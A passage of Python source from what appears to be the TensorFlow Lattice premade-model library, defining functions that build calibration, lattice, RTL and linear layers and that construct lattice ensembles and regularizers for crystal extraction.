model_config.regularizer_configs or [] if r.name.startswith(_OUTPUT_CALIB_REGULARIZER_PREFIX)] def _lattice_regularizers(model_config, feature_configs): """Returns lattice regularizers defined in the model and feature configs.""" # dict from regularizer name to pair of per feature l1 and l2 amounts. regularizers_dict = {} n_dims = len(feature_configs) for index, feature_config in enumerate(feature_configs): for regularizer_config in feature_config.regularizer_configs or []: if not ( regularizer_config.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX) or regularizer_config.name.startswith(_OUTPUT_CALIB_REGULARIZER_PREFIX)): if regularizer_config.name not in regularizers_dict: regularizers_dict[regularizer_config.name] = ([0.0] * n_dims, [0.0] * n_dims) regularizers_dict[ regularizer_config.name][0][index] += regularizer_config.l1 regularizers_dict[ regularizer_config.name][1][index] += regularizer_config.l2 regularizers = [(k,) + v for k, v in regularizers_dict.items()] for regularizer_config in model_config.regularizer_configs or []: if not ( regularizer_config.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX) or regularizer_config.name.startswith(_OUTPUT_CALIB_REGULARIZER_PREFIX)): regularizers.append((regularizer_config.name, regularizer_config.l1, regularizer_config.l2)) return regularizers class LayerOutputRange(enum.Enum): """Enum to indicate the output range based on the input of the next layers.""" MODEL_OUTPUT = 1 INPUT_TO_LATTICE = 2 INPUT_TO_FINAL_CALIBRATION = 3 def _output_range(layer_output_range, model_config, feature_config=None): """Returns min/max/init_min/init_max for a given output range.""" if layer_output_range == LayerOutputRange.INPUT_TO_LATTICE: if feature_config is None: raise ValueError('Expecting feature config for lattice inputs.') output_init_min = output_min = 0.0 output_init_max = output_max = feature_config.lattice_size - 1.0 elif layer_output_range == LayerOutputRange.MODEL_OUTPUT: output_min = model_config.output_min output_max = model_config.output_max # Note: due to the multiplicative nature of KroneckerFactoredLattice layers, # the initialization min/max do not correspond directly to the output # min/max. Thus we follow the same scheme as the KroneckerFactoredLattice # lattice layer to properly initialize the kernel and scale such that # the output does in fact respect the requested bounds. if ((isinstance(model_config, configs.CalibratedLatticeEnsembleConfig) or isinstance(model_config, configs.CalibratedLatticeConfig)) and model_config.parameterization == 'kronecker_factored'): output_init_min, output_init_max = kfl_lib.default_init_params( output_min, output_max) else: output_init_min = np.min(model_config.output_initialization) output_init_max = np.max(model_config.output_initialization) elif layer_output_range == LayerOutputRange.INPUT_TO_FINAL_CALIBRATION: output_init_min = output_min = 0.0 output_init_max = output_max = 1.0 else: raise ValueError('Unsupported layer output range.') return output_min, output_max, output_init_min, output_init_max def build_input_layer(feature_configs, dtype, ragged=False): """Creates a mapping from feature name to `tf.keras.Input`. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. dtype: dtype ragged: If the inputs are ragged tensors. Returns: Mapping from feature name to `tf.keras.Input` for the inputs specified by `feature_configs`. """ input_layer = {} shape = (None,) if ragged else (1,) for feature_config in feature_configs: layer_name = '{}_{}'.format(INPUT_LAYER_NAME, feature_config.name) if feature_config.num_buckets: input_layer[feature_config.name] = tf.keras.Input( shape=shape, ragged=ragged, dtype=tf.int32, name=layer_name) else: input_layer[feature_config.name] = tf.keras.Input( shape=shape, ragged=ragged, dtype=dtype, name=layer_name) return input_layer def build_multi_unit_calibration_layers(calibration_input_layer, calibration_output_units, model_config, layer_output_range, output_single_tensor, dtype): """Creates a mapping from feature names to calibration outputs. Args: calibration_input_layer: A mapping from feature name to `tf.keras.Input`. calibration_output_units: A mapping from feature name to units. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. output_single_tensor: If output for each feature should be a single tensor. dtype: dtype Returns: A mapping from feature name to calibration output Tensors. """ calibration_output = {} for feature_name, units in calibration_output_units.items(): if units == 0: raise ValueError( 'Feature {} is not used. Calibration output units is 0.'.format( feature_name)) feature_config = model_config.feature_config_by_name(feature_name) calibration_input = calibration_input_layer[feature_name] layer_name = '{}_{}'.format(CALIB_LAYER_NAME, feature_name) (output_min, output_max, output_init_min, output_init_max) = _output_range(layer_output_range, model_config, feature_config) if feature_config.num_buckets: kernel_initializer = tf.keras.initializers.RandomUniform( output_init_min, output_init_max) calibrated = ( categorical_calibration_layer.CategoricalCalibration( num_buckets=feature_config.num_buckets, units=units, output_min=output_min, output_max=output_max, kernel_initializer=kernel_initializer, monotonicities=feature_config.monotonicity if isinstance( feature_config.monotonicity, list) else None, default_input_value=feature_config.default_value, split_outputs=(units > 1 and not output_single_tensor), dtype=dtype, name=layer_name)(calibration_input)) else: kernel_regularizer = _input_calibration_regularizers( model_config, feature_config) monotonicity = feature_config.monotonicity if (utils.canonicalize_monotonicity(monotonicity) == 0 and feature_config.pwl_calibration_always_monotonic): monotonicity = 1 kernel_initializer = pwl_calibration_layer.UniformOutputInitializer( output_min=output_init_min, output_max=output_init_max, monotonicity=monotonicity, keypoints=feature_config.pwl_calibration_input_keypoints) calibrated = ( pwl_calibration_layer.PWLCalibration( units=units, input_keypoints=feature_config.pwl_calibration_input_keypoints, output_min=output_min, output_max=output_max, clamp_min=feature_config.pwl_calibration_clamp_min, clamp_max=feature_config.pwl_calibration_clamp_max, missing_input_value=feature_config.default_value, impute_missing=(feature_config.default_value is not None), kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer, monotonicity=monotonicity, convexity=feature_config.pwl_calibration_convexity, split_outputs=(units > 1 and not output_single_tensor), input_keypoints_type=feature_config .pwl_calibration_input_keypoints_type, dtype=dtype, name=layer_name)(calibration_input)) if output_single_tensor: calibration_output[feature_name] = calibrated elif units == 1: calibration_output[feature_name] = [calibrated] else: # calibrated will have already been split in this case. calibration_output[feature_name] = calibrated return calibration_output def build_calibration_layers(calibration_input_layer, model_config, layer_output_range, submodels, separate_calibrators, dtype): """Creates a calibration layer for `submodels` as list of list of features. Args: calibration_input_layer: A mapping from feature name to `tf.keras.Input`. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. submodels: A list of list of feature names. separate_calibrators: If features should be separately calibrated for each lattice in an ensemble. dtype: dtype Returns: A list of list of Tensors representing a calibration layer for `submodels`. """ # Create a list of (feature_name, calibration_output_idx) pairs for each # submodel. When using shared calibration, all submodels will have # calibration_output_idx = 0. submodels_input_features = [] calibration_last_index = collections.defaultdict(int) for submodel in submodels: submodel_input_features = [] submodels_input_features.append(submodel_input_features) for feature_name in submodel: submodel_input_features.append( (feature_name, calibration_last_index[feature_name])) if separate_calibrators: calibration_last_index[feature_name] += 1 # This is to account for shared calibration. calibration_output_units = { name: max(index, 1) for name, index in calibration_last_index.items() } calibration_output = build_multi_unit_calibration_layers( calibration_input_layer=calibration_input_layer, calibration_output_units=calibration_output_units, model_config=model_config, layer_output_range=layer_output_range, output_single_tensor=False, dtype=dtype) # Create passthrough nodes for each submodel input so that we can recover # the model structure for plotting and analysis. # {CALIB_PASSTHROUGH_NAME}_{feature_name}_ # {calibration_output_idx}_{submodel_idx}_{submodel_input_idx} submodels_inputs = [] for submodel_idx, submodel_input_features in enumerate( submodels_input_features): submodel_inputs = [] submodels_inputs.append(submodel_inputs) for (submodel_input_idx, (feature_name, calibration_output_idx)) in enumerate(submodel_input_features): passthrough_name = '{}_{}_{}_{}_{}'.format(CALIB_PASSTHROUGH_NAME, feature_name, calibration_output_idx, submodel_idx, submodel_input_idx) submodel_inputs.append( tf.identity( calibration_output[feature_name][calibration_output_idx], name=passthrough_name)) return submodels_inputs def build_aggregation_layer(aggregation_input_layer, model_config, calibrated_lattice_models, layer_output_range, submodel_index, dtype): """Creates an aggregation layer using the given calibrated lattice models. Args: aggregation_input_layer: A list or a mapping from feature name to `tf.keras.Input`, in the order or format expected by `calibrated_lattice_models`. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. calibrated_lattice_models: A list of calibrated lattice models of size model_config.middle_diemnsion, where each calbirated lattice model instance is constructed using the same model configuration object. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. submodel_index: Corresponding index into submodels. dtype: dtype Returns: A list of list of Tensors representing a calibration layer for `submodels`. """ (output_min, output_max, output_init_min, output_init_max) = _output_range(layer_output_range, model_config) lattice_sizes = [model_config.middle_lattice_size ] * model_config.middle_dimension lattice_monotonicities = [1] * model_config.middle_dimension # Create the aggergated embeddings to pass to the middle lattice. lattice_inputs = [] for i in range(model_config.middle_dimension): agg_layer_name = '{}_{}'.format(AGGREGATION_LAYER_NAME, i) agg_output = aggregation_layer.Aggregation( calibrated_lattice_models[i], name=agg_layer_name)( aggregation_input_layer) agg_output = tf.keras.layers.Reshape((1,))(agg_output) if model_config.middle_calibration: agg_output = pwl_calibration_layer.PWLCalibration( input_keypoints=np.linspace( -1.0, 1.0, num=model_config.middle_calibration_num_keypoints, dtype=np.float32), output_min=0.0, output_max=lattice_sizes[i] - 1.0, monotonicity=utils.canonicalize_monotonicity( model_config.middle_monotonicity), kernel_regularizer=_middle_calibration_regularizers(model_config), input_keypoints_type=model_config .middle_calibration_input_keypoints_type, dtype=dtype, )( agg_output) agg_output = tf.keras.layers.Reshape((1,))(agg_output) lattice_inputs.append(agg_output) # We use random monotonic initialization here to break the symmetry that we # would otherwise have between middle lattices. Since we use the same # CalibratedLattice for each of the middle dimensions, if we do not randomly # initialize the middle lattice we will have the same gradient flow back for # each middle dimension, thus acting the same as if there was only one middle # dimension. kernel_initializer = lattice_layer.RandomMonotonicInitializer( lattice_sizes=lattice_sizes, output_min=output_init_min, output_max=output_init_max) lattice_layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, submodel_index) return lattice_layer.Lattice( lattice_sizes=lattice_sizes, monotonicities=lattice_monotonicities, output_min=output_min, output_max=output_max, clip_inputs=False, interpolation=model_config.middle_lattice_interpolation, kernel_initializer=kernel_initializer, dtype=dtype, name=lattice_layer_name, )( lattice_inputs) def _monotonicities_from_feature_configs(feature_configs): """Returns list of monotonicities defined in the given feature_configs.""" monotonicities = [] for feature_config in feature_configs: if not feature_config.monotonicity: monotonicities.append(0) elif (isinstance(feature_config.monotonicity, six.string_types) and feature_config.monotonicity.lower() == 'none'): monotonicities.append(0) else: monotonicities.append(1) return monotonicities def _dominance_constraints_from_feature_configs(feature_configs): """Returns list of dominance constraints in the given feature_configs.""" feature_names = [feature_config.name for feature_config in feature_configs] monotonic_dominances = [] for dominant_idx, dominant_feature_config in enumerate(feature_configs): for dominance_config in dominant_feature_config.dominates or []: if dominance_config.feature_name in feature_names: weak_idx = feature_names.index(dominance_config.feature_name) if dominance_config.dominance_type == 'monotonic': monotonic_dominances.append((dominant_idx, weak_idx)) else: raise ValueError('Unrecognized dominance type: {}'.format( dominance_config.dominance_type)) return monotonic_dominances def build_linear_layer(linear_input, feature_configs, model_config, weighted_average, submodel_index, dtype): """Creates a `tfl.layers.Linear` layer initialized to be an average. Args: linear_input: Input to the linear layer. feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. weighted_average: If the linear coefficients should be positive and sum up to one. submodel_index: Corresponding index into submodels. dtype: dtype Returns: A `tfl.layers.Linear` instance. """ layer_name = '{}_{}'.format(LINEAR_LAYER_NAME, submodel_index) linear_input = tf.keras.layers.Concatenate(axis=1)(linear_input) num_input_dims = len(feature_configs) kernel_initializer = tf.keras.initializers.Constant([1.0 / num_input_dims] * num_input_dims) bias_initializer = tf.keras.initializers.Constant(0) if weighted_average: # Linear coefficients should be possitive and sum up to one. linear_monotonicities = [1] * num_input_dims normalization_order = 1 use_bias = False else: linear_monotonicities = _monotonicities_from_feature_configs( feature_configs) normalization_order = None use_bias = model_config.use_bias monotonic_dominances = _dominance_constraints_from_feature_configs( feature_configs) return linear_layer.Linear( num_input_dims=num_input_dims, monotonicities=linear_monotonicities, monotonic_dominances=monotonic_dominances, use_bias=use_bias, normalization_order=normalization_order, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, dtype=dtype, name=layer_name)( linear_input) def build_lattice_layer(lattice_input, feature_configs, model_config, layer_output_range, submodel_index, is_inside_ensemble, dtype): """Creates a `tfl.layers.Lattice` layer. Args: lattice_input: Input to the lattice layer. feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. submodel_index: Corresponding index into submodels. is_inside_ensemble: If this layer is inside an ensemble. dtype: dtype Returns: A `tfl.layers.Lattice` instance if `model_config.parameterization` is set to `'all_vertices'` or a `tfl.layers.KroneckerFactoredLattice` instance if set to `'kronecker_factored'`. Raises: ValueError: If `model_config.parameterization` is not one of `'all_vertices'` or `'kronecker_factored'`. """ layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, submodel_index) (output_min, output_max, output_init_min, output_init_max) = _output_range(layer_output_range, model_config) feature_names = [feature_config.name for feature_config in feature_configs] lattice_sizes = [ feature_config.lattice_size for feature_config in feature_configs ] lattice_monotonicities = _monotonicities_from_feature_configs(feature_configs) lattice_unimodalities = [ feature_config.unimodality for feature_config in feature_configs ] lattice_regularizers = _lattice_regularizers(model_config, feature_configs) or None # Construct trust constraints within this lattice. edgeworth_trusts = [] trapezoid_trusts = [] for conditional_idx, conditional_feature_config in enumerate(feature_configs): for trust_config in conditional_feature_config.reflects_trust_in or []: if trust_config.feature_name in feature_names: main_idx = feature_names.index(trust_config.feature_name) if trust_config.trust_type == 'edgeworth': edgeworth_trusts.append( (main_idx, conditional_idx, trust_config.direction)) elif trust_config.trust_type == 'trapezoid': trapezoid_trusts.append( (main_idx, conditional_idx, trust_config.direction)) else: raise ValueError('Unrecognized trust type: {}'.format( trust_config.trust_type)) elif is_inside_ensemble and trust_config.trust_type == 'trapezoid': logging.warning( 'A "main" feature (%s) for a trapezoid trust constraint is not ' 'present in a lattice that includes the "conditional" feature ' '(%s). In an ensemble model, this can result in constraint ' 'violations. Consider manually setting the ensemble structure if ' 'this constraint needs to be satisfied.', trust_config.feature_name, conditional_feature_config.name) monotonic_dominances = _dominance_constraints_from_feature_configs( feature_configs) if model_config.parameterization == 'all_vertices': layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, submodel_index) kernel_initializer = lattice_layer.LinearInitializer( lattice_sizes=lattice_sizes, monotonicities=lattice_monotonicities, unimodalities=lattice_unimodalities, output_min=output_init_min, output_max=output_init_max) return lattice_layer.Lattice( lattice_sizes=lattice_sizes, monotonicities=lattice_monotonicities, unimodalities=lattice_unimodalities, edgeworth_trusts=edgeworth_trusts, trapezoid_trusts=trapezoid_trusts, monotonic_dominances=monotonic_dominances, output_min=output_min, output_max=output_max, clip_inputs=False, interpolation=model_config.interpolation, kernel_regularizer=lattice_regularizers, kernel_initializer=kernel_initializer, dtype=dtype, name=layer_name)( lattice_input) elif model_config.parameterization == 'kronecker_factored': layer_name = '{}_{}'.format(KFL_LAYER_NAME, submodel_index) kernel_initializer = kfll.KFLRandomMonotonicInitializer( monotonicities=lattice_monotonicities, init_min=output_init_min, init_max=output_init_max, seed=model_config.random_seed) scale_initializer = kfll.ScaleInitializer( output_min=output_min, output_max=output_max) return kfll.KroneckerFactoredLattice( lattice_sizes=lattice_sizes[0], num_terms=model_config.num_terms, monotonicities=lattice_monotonicities, output_min=output_min, output_max=output_max, clip_inputs=False, kernel_initializer=kernel_initializer, scale_initializer=scale_initializer, dtype=dtype, name=layer_name)( lattice_input) else: raise ValueError('Unknown type of parameterization: {}'.format( model_config.parameterization)) def build_lattice_ensemble_layer(submodels_inputs, model_config, dtype): """Creates an ensemble of `tfl.layers.Lattice` layers. Args: submodels_inputs: List of inputs to each of the lattice layers in the ensemble. The order corresponds to the elements of model_config.lattices. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. dtype: dtype Returns: A list of `tfl.layers.Lattice` instances. """ lattice_outputs = [] for submodel_index, (lattice_feature_names, lattice_input) in enumerate( zip(model_config.lattices, submodels_inputs)): lattice_feature_configs = [ model_config.feature_config_by_name(feature_name) for feature_name in lattice_feature_names ] lattice_layer_output_range = ( LayerOutputRange.INPUT_TO_FINAL_CALIBRATION if model_config.output_calibration else LayerOutputRange.MODEL_OUTPUT) lattice_outputs.append( build_lattice_layer( lattice_input=lattice_input, feature_configs=lattice_feature_configs, model_config=model_config, layer_output_range=lattice_layer_output_range, submodel_index=submodel_index, is_inside_ensemble=True, dtype=dtype)) return lattice_outputs def build_rtl_layer(calibration_outputs, model_config, submodel_index, average_outputs, dtype): """Creates a `tfl.layers.RTL` layer. This function expects that all features defined in model_config.feature_configs are used and present in calibration_outputs. Args: calibration_outputs: A mapping from feature name to calibration output. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. submodel_index: Corresponding index into submodels. average_outputs: Whether to average the outputs of this layer. dtype: dtype Returns: A `tfl.layers.RTL` instance. Raises: ValueError: If `model_config.parameterization` is not one of `'all_vertices'` or `'kronecker_factored'`. """ layer_name = '{}_{}'.format(RTL_LAYER_NAME, submodel_index) rtl_layer_output_range = ( LayerOutputRange.INPUT_TO_FINAL_CALIBRATION if model_config.output_calibration else LayerOutputRange.MODEL_OUTPUT) (output_min, output_max, output_init_min, output_init_max) = _output_range(rtl_layer_output_range, model_config) lattice_regularizers = _lattice_regularizers( model_config, model_config.feature_configs) or None rtl_inputs = collections.defaultdict(list) for feature_config in model_config.feature_configs: passthrough_name = '{}_{}'.format(RTL_INPUT_NAME, feature_config.name) calibration_output = tf.identity( calibration_outputs[feature_config.name], name=passthrough_name) if feature_config.monotonicity in [1, -1, 'increasing', 'decreasing']: rtl_inputs['increasing'].append(calibration_output) else: rtl_inputs['unconstrained'].append(calibration_output) lattice_size = model_config.feature_configs[0].lattice_size if model_config.parameterization == 'all_vertices': kernel_initializer = 'random_monotonic_initializer' elif model_config.parameterization == 'kronecker_factored': kernel_initializer = 'kfl_random_monotonic_initializer' else: raise ValueError('Unknown type of parameterization: {}'.format( model_config.parameterization)) return rtl_layer.RTL( num_lattices=model_config.num_lattices, lattice_rank=model_config.lattice_rank, lattice_size=lattice_size, output_min=output_min, output_max=output_max, init_min=output_init_min, init_max=output_init_max, random_seed=model_config.random_seed, clip_inputs=False, interpolation=model_config.interpolation, parameterization=model_config.parameterization, num_terms=model_config.num_terms, kernel_regularizer=lattice_regularizers, kernel_initializer=kernel_initializer, average_outputs=average_outputs, dtype=dtype, name=layer_name)( rtl_inputs) def build_calibrated_lattice_ensemble_layer(calibration_input_layer, model_config, average_outputs, dtype): """Creates a calibration layer followed by a lattice ensemble layer. Args: calibration_input_layer: A mapping from feature name to `tf.keras.Input`. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. average_outputs: Whether to average the outputs of this layer. dtype: dtype Returns: A `tfl.layers.RTL` instance if model_config.lattices is 'rtl_layer. Otherwise a list of `tfl.layers.Lattice` instances. """ if model_config.lattices == 'rtl_layer': num_features = len(model_config.feature_configs) units = [1] * num_features if model_config.separate_calibrators: num_inputs = model_config.num_lattices * model_config.lattice_rank # We divide the number of inputs semi-evenly by the number of features. for i in range(num_features): units[i] = ((i + 1) * num_inputs // num_features - i * num_inputs // num_features) calibration_output_units = { feature_config.name: units[i] for i, feature_config in enumerate(model_config.feature_configs) } calibration_outputs = build_multi_unit_calibration_layers( calibration_input_layer=calibration_input_layer, calibration_output_units=calibration_output_units, model_config=model_config, layer_output_range=LayerOutputRange.INPUT_TO_LATTICE, output_single_tensor=True, dtype=dtype) lattice_outputs = build_rtl_layer( calibration_outputs=calibration_outputs, model_config=model_config, submodel_index=0, average_outputs=average_outputs, dtype=dtype) else: submodels_inputs = build_calibration_layers( calibration_input_layer=calibration_input_layer, model_config=model_config, layer_output_range=LayerOutputRange.INPUT_TO_LATTICE, submodels=model_config.lattices, separate_calibrators=model_config.separate_calibrators, dtype=dtype) lattice_outputs = build_lattice_ensemble_layer( submodels_inputs=submodels_inputs, model_config=model_config, dtype=dtype) if average_outputs: lattice_outputs = tf.keras.layers.Average()(lattice_outputs) return lattice_outputs def build_linear_combination_layer(ensemble_outputs, model_config, dtype): """Creates a `tfl.layers.Linear` layer initialized to be an average. Args: ensemble_outputs: Ensemble outputs to be linearly combined. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. dtype: dtype Returns: A `tfl.layers.Linear` instance. """ if isinstance(ensemble_outputs, list): num_input_dims = len(ensemble_outputs) linear_input = tf.keras.layers.Concatenate(axis=1)(ensemble_outputs) else: num_input_dims = int(ensemble_outputs.shape[1]) linear_input = ensemble_outputs kernel_initializer = tf.keras.initializers.Constant(1.0 / num_input_dims) bias_initializer = tf.keras.initializers.Constant(0) if (not model_config.output_calibration and model_config.output_min is None and model_config.output_max is None): normalization_order = None else: # We need to use weighted average to keep the output range. normalization_order = 1 # Bias term cannot be used when this layer should have bounded output. if model_config.use_bias: raise ValueError('Cannot use a bias term in linear combination with ' 'output bounds or output calibration') return linear_layer.Linear( num_input_dims=num_input_dims, monotonicities=['increasing'] * num_input_dims, normalization_order=normalization_order, use_bias=model_config.use_bias, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, dtype=dtype, name=OUTPUT_LINEAR_COMBINATION_LAYER_NAME)( linear_input) def build_output_calibration_layer(output_calibration_input, model_config, dtype): """Creates a monotonic output calibration layer with inputs range [0, 1]. Args: output_calibration_input: Input to the output calibration layer. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. dtype: dtype Returns: A `tfl.layers.PWLCalibration` instance. """ # kernel format: bias followed by diffs between consecutive keypoint outputs. kernel_init_values = np.ediff1d( model_config.output_initialization, to_begin=model_config.output_initialization[0]) input_keypoints = np.linspace(0.0, 1.0, num=len(kernel_init_values)) kernel_initializer = tf.keras.initializers.Constant(kernel_init_values) kernel_regularizer = _output_calibration_regularizers(model_config) return pwl_calibration_layer.PWLCalibration( input_keypoints=input_keypoints, output_min=model_config.output_min, output_max=model_config.output_max, kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer, monotonicity=1, input_keypoints_type=model_config.output_calibration_input_keypoints_type, dtype=dtype, name=OUTPUT_CALIB_LAYER_NAME)( output_calibration_input) def set_categorical_monotonicities(feature_configs): """Maps categorical monotonicities to indices based on specified vocab list. Args: feature_configs: A list of `tfl.configs.FeatureConfig` objects. """ if not isinstance(feature_configs, list) or any( not isinstance(fc, configs.FeatureConfig) for fc in feature_configs): raise ValueError( 'feature_configs must be a list of tfl.configs.FeatureConfig objects: ' '{}'.format(feature_configs)) for feature_config in feature_configs: if feature_config.num_buckets and isinstance(feature_config.monotonicity, list): # Make sure the vocabulary list exists. If not, assume user has already # properly set monotonicity as proper indices for this calibrator. if not feature_config.vocabulary_list: continue if not all( isinstance(m, (list, tuple)) and len(m) == 2 for m in feature_config.monotonicity): raise ValueError( 'Monotonicities should be a list of pairs (list/tuples): {}'.format( feature_config.monotonicity)) indexed_monotonicities = [] index_map = { category: index for (index, category) in enumerate(feature_config.vocabulary_list) } if feature_config.default_value is not None: index_map[feature_config.default_value] = feature_config.num_buckets - 1 for left, right in feature_config.monotonicity: for category in [left, right]: if category not in index_map: raise ValueError( 'Category `{}` not found in vocabulary list for feature `{}`' .format(category, feature_config.name)) indexed_monotonicities.append((index_map[left], index_map[right])) feature_config.monotonicity = indexed_monotonicities def set_random_lattice_ensemble(model_config, feature_names=None): """Sets random lattice ensemble in the given model_config. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. feature_names: A list of feature names. If not provided, feature names will be extracted from the feature configs contained in the model_config. """ if not isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError( 'model_config must be a tfl.configs.CalibratedLatticeEnsembleConfig: {}' .format(type(model_config))) if model_config.lattices != 'random': raise ValueError('model_config.lattices must be set to \'random\'.') # Extract feature names if feature_names is None: if model_config.feature_configs is None: raise ValueError( 'Feature configs must be specified if feature names are not provided.' ) feature_names = [ feature_config.name for feature_config in model_config.feature_configs ] # Start by using each feature once. np.random.seed(model_config.random_seed) model_config.lattices = [[] for _ in range(model_config.num_lattices)] for feature_name in feature_names: non_full_indices = [ i for (i, lattice) in enumerate(model_config.lattices) if len(lattice) < model_config.lattice_rank ] model_config.lattices[np.random.choice(non_full_indices)].append( feature_name) # Fill up lattices avoiding repeated features. for lattice in model_config.lattices: feature_names_not_in_lattice = [ feature_name for feature_name in feature_names if feature_name not in lattice ] remaining_size = model_config.lattice_rank - len(lattice) lattice.extend( np.random.choice( feature_names_not_in_lattice, size=remaining_size, replace=False)) def _add_pair_to_ensemble(lattices, lattice_rank, i, j): """Adds pair (i, j) to the ensemble heuristically.""" # First check if (i, j) pair is already present in a lattice. for lattice in lattices: if i in lattice and j in lattice: return # Try adding to a lattice that already has either i or j. for lattice in lattices: if len(lattice) < lattice_rank: if i in lattice: lattice.add(j) return if j in lattice: lattice.add(i) return # Add both i and j to a lattice that has enough space left. for lattice in lattices: if len(lattice) < lattice_rank - 1: lattice.add(i) lattice.add(j) return # Create a new lattice with pair (i, j). lattices.append(set([i, j])) def _set_all_pairs_cover_lattices(prefitting_model_config, feature_names): """Sets prefitting lattice ensemble such that it covers all feature pairs.""" # Pairs of co-occurrence that need to exist in the all-pairs cover. to_cover = list(itertools.combinations(range(len(feature_names)), 2)) np.random.seed(prefitting_model_config.random_seed) np.random.shuffle(to_cover) lattices = [] for (i, j) in to_cover: _add_pair_to_ensemble(lattices, prefitting_model_config.lattice_rank, i, j) prefitting_model_config.lattices = [ [feature_names[i] for i in lattice] for lattice in lattices ] def construct_prefitting_model_config(model_config, feature_names=None): """Constructs a model config for a prefitting model for crystal extraction. Args: model_config: Model configuration object describing model architecture. Should be a `tfl.configs.CalibratedLatticeEnsemble` instance. feature_names: A list of feature names. If not provided, feature names will be extracted from the feature configs contained in the model_config. Returns: A `tfl.configs.CalibratedLatticeEnsembleConfig` instance. """ if not isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError( 'model_config must be a tfl.configs.CalibratedLatticeEnsembleConfig: {}' .format(type(model_config))) if model_config.lattices != 'crystals': raise ValueError('model_config.lattices must be set to \'crystals\'.') # Extract feature names from model_config if not provided. if feature_names is None: if model_config.feature_configs is None: raise ValueError( 'Feature configs must be specified if feature names are not provided.' ) feature_names = [ feature_config.name for feature_config in model_config.feature_configs ] # Make a copy of the model config provided and set all pairs covered. prefitting_model_config = copy.deepcopy(model_config) # Set parameterization of prefitting model to 'all_vertices' to extract # crystals using normal lattice because we do not have laplacian/torsion # regularizers for KFL. This should still extract could feature combinations. prefitting_model_config.parameterization = 'all_vertices' _set_all_pairs_cover_lattices( prefitting_model_config=prefitting_model_config, feature_names=feature_names) # Trim the model for faster prefitting. for feature_config in prefitting_model_config.feature_configs: feature_config.lattice_size = 2 # Unimodality requires lattice_size > 2. feature_config.unimodality = 0 # Disable 2d constraints to avoid potential constraint violations. feature_config.dominates = None feature_config.reflects_trust_in = None # Return our properly constructed prefitting model config. return prefitting_model_config def _verify_prefitting_model(prefitting_model, feature_names): """Checks that prefitting_model has the proper input layer.""" if isinstance(prefitting_model, tf.keras.Model): layer_names = [layer.name for layer in prefitting_model.layers] elif isinstance(prefitting_model, tf.estimator.Estimator): layer_names = prefitting_model.get_variable_names() else: raise ValueError('Invalid model type for prefitting_model: {}'.format( type(prefitting_model))) for feature_name in feature_names: if isinstance(prefitting_model, tf.keras.Model): input_layer_name = '{}_{}'.format(INPUT_LAYER_NAME, feature_name) if input_layer_name not in layer_names: raise ValueError( 'prefitting_model does not match prefitting_model_config. Make ' 'sure that prefitting_model is the proper type and constructed ' 'from the prefitting_model_config: {}'.format( type(prefitting_model))) else: pwl_input_layer_name = '{}_{}/{}'.format( CALIB_LAYER_NAME, feature_name, pwl_calibration_layer.PWL_CALIBRATION_KERNEL_NAME) cat_input_layer_name = '{}_{}/{}'.format( CALIB_LAYER_NAME, feature_name, categorical_calibration_layer.CATEGORICAL_CALIBRATION_KERNEL_NAME) if (pwl_input_layer_name not in layer_names and cat_input_layer_name not in layer_names): raise ValueError( 'prefitting_model does not match prefitting_model_config. Make ' 'sure that prefitting_model is the proper type and constructed ' 'from the prefitting_model_config: {}'.format( type(prefitting_model))) def _get_lattice_weights(prefitting_model, lattice_index): """Gets the weights of the lattice at the specfied index.""" if isinstance(prefitting_model, tf.keras.Model): lattice_layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, lattice_index) weights = tf.keras.backend.get_value( prefitting_model.get_layer(lattice_layer_name).weights[0]) else: # We have already checked the types by this point, so if prefitting_model # is not a keras Model it must be an Estimator. lattice_kernel_variable_name = '{}_{}/{}'.format( LATTICE_LAYER_NAME, lattice_index, lattice_layer.LATTICE_KERNEL_NAME) weights = prefitting_model.get_variable_value(lattice_kernel_variable_name) return weights def _get_torsions_and_laplacians(prefitting_model_config, prefitting_model, feature_names): """Returns average torsion and laplacian regularizers in prefitted model.""" num_fatures = len(feature_names) laplacians = [[] for _ in range(num_fatures)] torsions = [[[] for _ in range(num_fatures)] for _ in range(num_fatures)] for (lattice_index, lattice) in enumerate(prefitting_model_config.lattices): # Get lattice weights and normalize them. weights = _get_lattice_weights(prefitting_model, lattice_index) weights -= np.min(weights) weights /= np.max(weights) weights = tf.constant(weights) # Convert feature names in the lattice to their index in feature_names. lattice = [feature_names.index(feature_name) for feature_name in lattice] lattice_sizes = [2] * len(lattice) # feature_* refers to feature index in feature_names. # within_lattice_index_* is the index of input dimenstion of the lattice. for within_lattice_index_0, feature_0 in enumerate(lattice): l2 = [0] * len(lattice) l2[within_lattice_index_0] = 1 laplacians[feature_0].append( lattice_lib.laplacian_regularizer( weights=weights, lattice_sizes=lattice_sizes, l2=l2)) for within_lattice_index_1, feature_1 in 